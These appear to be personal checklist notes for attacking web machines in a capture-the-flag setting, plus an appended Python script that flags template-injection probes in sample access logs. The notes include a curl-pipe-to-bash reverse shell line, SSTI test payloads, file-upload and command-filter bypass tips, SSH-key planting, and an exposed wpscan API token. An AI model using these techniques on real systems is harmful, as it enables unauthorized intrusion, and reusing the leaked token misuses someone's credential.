- Is there maybe a walkthrough of what you're trying to do? If so, just follow it; otherwise just google and try to understand what you're dealing with
- check HTML source
- search for possible username in website/HTML source
- DNS name wrong maybe?
- search for new domains on the website itself, something like web.box.htb
- Wappalyzer
- nikto
- wpscan (api-token=PuHLRlILzrWrL0CDUE4dsORNwoq4l56mxQF5kHO2ZX0)
- Google version numbers of EVERYTHING
- Gobuster!
- DEFAULT PASSWORDS
- inspect the links the website has… maybe some URL parameters like IDs?
- Look for templates/ways to input; copy the request and send it to sqlmap
- if possible upload a file and execute a reverse shell
- If it doesn't let you upload certain files, mess with the extension
- later, to find where the uploaded file is, you can use Gobuster because sometimes it is renamed. Example:
gobuster dir -u http://example.com/uploads/ -w wordlist
then gobuster will search through the uploads directory.
- https://www.revshells.com
- you can do a reverse shell with curl:
curl http://<your ip>/shell.sh | bash
- sometimes you can't get a shell because connections on other ports are blocked with a firewall; in that case try to use services that are available, like ssh
- you can generate ssh keys and upload them into the home directory of the user as authorized_keys
- use different ASCII values for everything to avoid stupid bugs
- Cookies
- look for new directories in the burpsuite Target tab
- if you find strings/documents, check for base64 and cyberchef magic
- use Repeater
- Hacktricks
- LFI or RFI
- SSTI
- those can be everywhere. Any input you can do, be it text, image, voice, OCR etc., check for SSTI by providing things like
{{7 * 7}}
or ${{7 * 7}}
- XXE?
- capture ssh keys also from LFI/RFI and XXE
- capture windows NTLM (responder) also from LFI/RFI and XXE
- API
- APIs can sometimes execute system commands, however the input is filtered; try to bypass those filters, for example with
\n
in front of your command, or a '.
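Defender-side companion to the SSTI bullet above, added here as an example and not part of the original notes: it percent-decodes request targets from constructed access-log lines, flags the {{7*7}} / ${{7*7}} style probes (plus a few other template-engine syntaxes, a generalization of the two shapes in the notes), and reports clients that probed more than once. All addresses, paths and log lines are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). Addresses, paths
# and timestamps are made up for this example; they come from no real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%7B7%2A7%7D%7D HTTP/1.1" 200 488
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /profile?name=%24%7B%7B7*7%7D%7D HTTP/1.1" 200 490
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /upload HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=%3C%25%3D7*7%25%3E HTTP/1.1" 200 488
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# Template-expression shapes: {{...}} and ${{...}} from the checklist, plus
# ${...}, #{...} and <%...%> used by other common template engines.
TEMPLATE_EXPR = re.compile(r"\$?\{\{.*?\}\}|\$\{.*?\}|#\{.*?\}|<%.*?%>")

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded probes are not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssti_probes(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, request_path, probe) for every request whose
    decoded target contains a template expression."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, target = m.groups()
        decoded = fully_decode(target)
        hit = TEMPLATE_EXPR.search(decoded)
        if hit:
            findings.append((ip, decoded.split("?", 1)[0], hit.group(0)))
    return findings

def probing_clients(findings, min_hits: int = 2) -> set[str]:
    """Clients that sent template probes in at least min_hits requests."""
    counts: dict[str, int] = {}
    for ip, _path, _probe in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return {ip for ip, n in counts.items() if n >= min_hits}

print(probing_clients(find_ssti_probes(SAMPLE_LOG)))  # {'10.0.0.9'}
```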